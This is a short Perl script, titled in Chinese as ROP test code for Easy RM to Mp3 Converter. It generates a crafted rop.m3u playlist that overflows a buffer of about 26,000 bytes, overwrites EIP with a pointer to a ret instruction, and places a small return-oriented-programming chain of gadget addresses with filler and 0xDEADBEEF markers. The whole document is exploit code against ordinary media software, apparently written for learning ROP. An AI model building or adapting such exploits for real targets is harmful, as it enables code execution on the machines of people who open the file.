Easy RM to Mp3 Converter測試rop的代碼

my $file="rop.m3u";
my $buffersize=26094-20-8-4;
my $junk="A"x$buffersize;
my $eip=pack('V',0x100102DC);#pointer to ret
my $junk2="AAAA";#compensate,to make sure esp points at first rop gadget
my $rop=pack('V',0x10026D56);
$rop=$rop.pack('V',0x50505050);
$rop=$rop.pack('V',0x1002DC24);
$rop=$rop.pack('V',0xDEADBEEF);
my $rest="C"x1000;
my $payload=$junk.$eip.$junk2.$rop.$rest;
print "Payload size: ".length($payload)."\n";
open($FILE,">$file");
print $FILE $payload;
close($FILE);
print "m3u File $file Created successfully\n";